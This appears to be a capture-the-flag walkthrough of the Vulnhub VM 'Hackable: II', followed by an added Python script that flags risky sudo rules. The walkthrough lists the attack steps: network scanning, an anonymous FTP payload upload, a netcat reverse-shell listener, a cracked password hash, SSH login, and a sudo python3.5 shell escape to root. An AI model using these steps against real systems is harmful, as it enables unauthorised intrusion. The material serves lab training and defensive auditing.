HACKABLE: II (Vulnhub) Walkthrough
I personally enjoyed playing with this box; it taught me how to stay focused while doing enumeration and exploitation. There’s so much going on with this box for post exploitation. Let’s pwn it!
Here is the link to download this VM:
Network Scanning
We always start with network scanning. Let’s find the target IP address by running netdiscover.
┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0
As the netdiscover result shows, our target IP address is 192.168.118.166.
Enumeration/Reconnaissance
Our next step is scanning the target machine. Let’s start with nmap.
┌─[✗]─[root@RDX]─[~]
└──╼ #nmap -v -sT 192.168.118.166 -p- -sV -A -O
http://192.168.118.166/
The FTP server allows anonymous access, so we try to upload a payload.
┌─[root@RDX]─[~]
└──╼ #ftp 192.168.118.166
http://192.168.118.166/files/
┌─[root@RDX]─[~]
└──╼ #nc -nlvp 443
$ id
$ cd /home
$ ls
$ cat important.txt
Now I got a hash.
hash=cf4c2232354952690368f1b3dfdfb24d = onion
┌─[root@RDX]─[~]
└──╼ #ssh shrek@192.168.118.166
shrek@ubuntu:~$ ls
shrek@ubuntu:~$ cat user.txt
Privilege Escalation
shrek@ubuntu:~$ sudo -l
shrek@ubuntu:~$ sudo python3.5 -c 'import os; os.system("/bin/sh")'
# id
# cd /root
# ls
# cat root.txt
Successfully got root privileges and ‘root.txt’.
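The escalation above works because the sudo policy lets shrek run python3.5 with arguments of his choosing. The following audit is an added example, not part of the original walkthrough: it flags such rules in `sudo -l` output. The sample output and the interpreter list are constructed assumptions, since the walkthrough does not show the real output.

```python
import re

# Binaries that give a shell or arbitrary code execution when run via sudo.
# Assumed, non-exhaustive list chosen for this example.
SHELL_CAPABLE = re.compile(
    r"^(python[\d.]*|perl|ruby|lua|node|php|bash|sh|zsh|dash|vim?|less|awk|find|env)$")

# One rule line of `sudo -l`: "(runas) [TAG: ...] cmd[, cmd...]"
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# Constructed sample; the walkthrough does not show the real `sudo -l` output.
SAMPLE = """\
Matching Defaults entries for shrek on ubuntu:
    env_reset, mail_badpass

User shrek may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/python3.5
    (root) /usr/bin/systemctl status apache2
"""

def audit_sudo_l(text):
    """Return (runas, command, nopasswd, reason) for each risky sudo rule."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header or Defaults line, not a rule
        runas = m.group("runas")
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in filter(None, (c.strip() for c in m.group("cmds").split(","))):
            if cmd == "ALL":
                findings.append((runas, cmd, nopasswd, "unrestricted"))
                continue
            parts = cmd.split()
            binary = parts[0].rsplit("/", 1)[-1]
            # A rule with fixed arguments only permits those arguments; a bare
            # path or a wildcard leaves -c / the script path to the caller.
            if SHELL_CAPABLE.match(binary) and (len(parts) == 1 or "*" in cmd):
                findings.append((runas, parts[0], nopasswd, "arbitrary code execution"))
    return findings

if __name__ == "__main__":
    for runas, cmd, nopasswd, reason in audit_sudo_l(SAMPLE):
        print(f"[!] {cmd} as {runas} (NOPASSWD={nopasswd}): {reason}")
```

Replacing such a rule with a root-owned, non-writable script pinned by full path and arguments removes the finding.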